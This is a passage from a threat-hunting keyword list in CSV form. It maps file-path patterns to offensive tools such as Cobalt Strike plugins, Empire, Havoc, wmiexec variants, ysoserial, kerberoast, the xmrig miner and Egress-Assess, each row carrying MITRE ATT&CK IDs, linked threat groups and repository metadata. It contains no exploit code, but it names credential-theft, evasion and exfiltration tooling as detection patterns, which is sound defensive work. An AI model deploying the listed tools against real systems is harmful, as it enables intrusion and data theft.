Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/wiresocks.git*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*/wmeye/*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" +"*/WMI Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*/wmi.dropper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/WMI/wmi.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/wmiexec/*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*/wmiexec2.git*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*/wmiexec-Pro*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*/wmisploit*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*/word_list.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/word_list.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/wordlists/owa_directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/wordlists/skype-directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/workflow/test/dirbscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/wpaf/finder.py*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" +"*/wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/WSPCoerce.git*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*/wwlib/lolbins/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*/www/exploit.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" +"*/x0rz/*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x0rz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/x64_slim.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/xan7r/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*/xar-1.5.2.tar.gz*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xen-mimi.ps1*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*/xml_attack.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xml_attacks.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xmlrpc-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xmpp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xmpp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xmrig.git*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xndpxs/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/xndpxs/CVE-2022-0847","1","1","N/A","N/A","1","8","7","2022-03-07T17:59:12Z","2022-03-07T17:51:02Z" +"*/xor/stager.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*/xor/xor.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" 
+"*/XOR_b64_encrypted/*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*/XorObfuscation.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/xpath_injection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xPipe/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*/xss_robertux.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xxe_fuzz.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/yanghaoi/_CNA*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/ysoserial/*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a 
tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 